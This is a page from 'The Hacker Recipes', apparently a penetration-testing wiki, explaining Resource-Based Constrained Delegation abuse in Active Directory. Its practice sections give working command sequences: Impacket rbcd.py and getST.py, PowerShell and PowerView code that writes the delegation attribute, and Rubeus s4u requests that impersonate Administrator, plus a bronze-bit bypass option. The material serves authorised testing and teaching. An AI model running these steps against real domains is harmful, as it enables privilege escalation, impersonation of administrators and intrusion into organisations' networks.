The Hacker Recipes
GitHubTwitterExegolTools
Search…
Introduction
Active Directory
Reconnaissance
Movement
Credentials
MITM and coerced auths
NTLM
Kerberos
Pre-auth bruteforce
Pass the key
Overpass the hash
Pass the ticket
Pass the cache
Forged tickets
ASREQroast
ASREProast
Kerberoast
Delegations
(KUD) Unconstrained
(KCD) Constrained
(RBCD) Resource-based constrained
S4U2self abuse
Bronze Bit
Shadow Credentials
UnPAC the hash
Pass the Certificate
sAMAccountName spoofing
SPN-jacking
DACL abuse
Group policies
🛠️ Trusts
Built-ins & settings
Netlogon
Certificate Services (AD-CS)
Exchange services
Print Spooler Service
Persistence
Web services
Reconnaissance
Configuration
Accounts and sessions
User inputs
Systems & services
Reconnaissance
Movement
Privilege escalation
Pivoting
🛠️ Physical
Locks
Networking
Machines
Super secret zones
🛠️ Intelligence gathering
CYBINT
OSINT
GEOINT
🛠️ RADIO
RFID
Bluetooth
Wi-Fi
Wireless keyboard/mouse
🛠️ mobile apps
Android
iOS
Powered By GitBook
(RBCD) Resource-based constrained

Theory

If an account, having the capability to edit the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of another object (e.g. the GenericWrite ACE, see Abusing ACLs), is compromised, an attacker can use it populate that attribute, hence configuring that object for RBCD.
Machine accounts can edit their own msDS-AllowedToActOnBehalfOfOtherIdentity attribute, hence allowing RBCD attacks on relayed machine accounts authentications.
For this attack to work, the attacker needs to populate the target attribute with an account having a ServicePrincipalName set (needed for Kerberos delegation operations). The usual way to conduct these attacks is to create a computer account, which comes with an SPN set. This is usually possible thanks to a domain-level attribute called MachineAccountQuota that allows regular users to create up to 10 computer accounts. While this "computer account creation + RBCD attack" is the most common exploitation path, doing so with a user account (having at least one SPN) is perfectly feasible.
Then, in order to abuse this, the attacker has to control the account the object's attribute has been populated with (i.e. the account that has an SPN). Using that account's credentials, the attacker can obtain a ticket through S4U2Self and S4U2Proxy requests, just like constrained delegation with protocol transition.
In the end, an RBCD abuse results in a Service Ticket to authenticate on a target service on behalf of a user. Once the final Service Ticket is obtained, it can be used with Pass-the-Ticket to access the target service.
On a side note, a technique called AnySPN or "service class modification" can be used concurrently with pass-the-ticket to change the service class the Service Ticket was destined to (e.g. for the cifs/target.domain.local SPN, the service class is cifs).
The msDS-AllowedToActOnBehalfOfOtherIdentity was introduced with Windows Server 2012 implying that RBCD only works when the Domain Controller Functionality Level (DCFL) is Windows Server 2012 or higher.

Practice

UNIX-like
Windows
1 - Edit the target's "rbcd" attribute (ACE abuse)
Impacket's rbcd.py script (Python) can be used to read, write or clear the delegation rights, using the credentials of a domain user that has the needed permissions.
1
# Read the attribute
2
rbcd.py -delegate-to 'target#x27; -dc-ip 'DomainController' -action read 'DOMAIN'/'POWERFULUSER':'PASSWORD'
3
4
# Append value to the msDS-AllowedToActOnBehalfOfOtherIdentity
5
rbcd.py -delegate-from 'controlledaccountwithSPN' -delegate-to 'target#x27; -dc-ip 'DomainController' -action write 'DOMAIN'/'POWERFULUSER':'PASSWORD'
Copied!
Testers can also use ntlmrelayx to set the delegation rights with the --delegate-access option when conducting this attack from a relayed authentication.
2 - Obtain a ticket (delegation operation)
🎫
Once the attribute has been modified, the Impacket script getST (Python) can then perform all the necessary steps to obtain the final "impersonating" ST (in this case, "Administrator" is impersonated but it can be any user in the environment).
1
getST.py -spn "cifs/target" -impersonate Administrator -dc-ip $DomainController 'DOMAIN/controlledaccountwithSPN:SomePassword'
Copied!
In some cases, the delegation will not work. Depending on the context, the bronze bit vulnerability (CVE-2020-17049) can be used with the -force-forwardable option to try to bypass restrictions.
The SPN (Service Principal Name) set can have an impact on what services will be reachable. For instance, cifs/target.domain or host/target.domain will allow most remote dumping operations (more info on adsecurity.org). There however scenarios where the SPN can be changed (AnySPN) to access more service. This technique is automatically tried by Impacket scripts when doing pass-the-ticket.
3 - Pass-the-ticket
🛂
Once the ticket is obtained, it can be used with pass-the-ticket.
In order to run the following commands and tools as other users, testers can check the user impersonation part.
1 - Edit the target's security descriptor (ACE abuse)
The PowerShell ActiveDirectory module's cmdlets Set-ADComputer and Get-ADComputer can be used to write and read the attributed of an object (in this case, to modify the delegation rights).
1
# Read the security descriptor
2
Get-ADComputer $targetComputer -Properties PrincipalsAllowedToDelegateToAccount
3
4
# Populate the msDS-AllowedToActOnBehalfOfOtherIdentity
5
Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount 'controlledaccountwithSPN'
Copied!
PowerSploit's PowerView module is an alternative that can be used to edit the attribute (source).
1
# Obtain the SID of the controlled account with SPN (e.g. Computer account)
2
$ComputerSid = Get-DomainComputer "controlledaccountwithSPN" -Properties objectsid | Select -Expand objectsid
3
4
# Build a generic ACE with the attacker-added computer SID as the pricipal, and get the binary bytes for the new DACL/ACE
5
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
6
$SDBytes = New-Object byte[] ($SD.BinaryLength)
7
$SD.GetBinaryForm($SDBytes, 0)
8
9
# set SD in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the target comptuer account
10
Get-DomainComputer "targetquot; | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
Copied!
2 - Obtain a ticket (delegation operation)
🎫
Rubeus can then be used to request the TGT and "impersonation ST" and inject it for later use.
1
# Request the TGT
2
Rubeus.exe tgtdeleg /nowrap
3
4
# Request the "impersonation" service ticke
5
Rubeus.exe s4u /nowrap /impersonateuser:"administrator" /msdsspn:"cifs/target" /domain:"domain" /user:"controlledaccountwithSPN" /rc4:$NThash
Copied!
The NT hash can be computed as follows.
1
Rubeus.exe hash /password:$password
Copied!
In some cases, the delegation will not work. Depending on the context, the bronze bit vulnerability (CVE-2020-17049) can be used with the /bronzebit flag to try to bypass restrictions.
The SPN (Service Principal Name) set can have an impact on what services will be reachable. For instance, cifs/target.domain or host/target.domain will allow most remote dumping operations (more info on adsecurity.org). There however scenarios where the SPN can be changed (AnySPN) to access more services. This technique can be exploited with the /altservice flag with Rubeus.
3 - Pass-the-ticket
🛂
Once the ticket is injected, it can natively be used when accessing the service (see pass-the-ticket).

Resources

Resource-Based Constrained Delegation Abuse
Stealthbits Technologies
Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory
Shenanigans Labs
CVE-2020-17049: Kerberos Bronze Bit Attack - Theory
NetSPI
Previous
(KCD) Constrained
Next
S4U2self abuse
Last modified 3mo ago
Copy link
Contents
Theory
Practice
Resources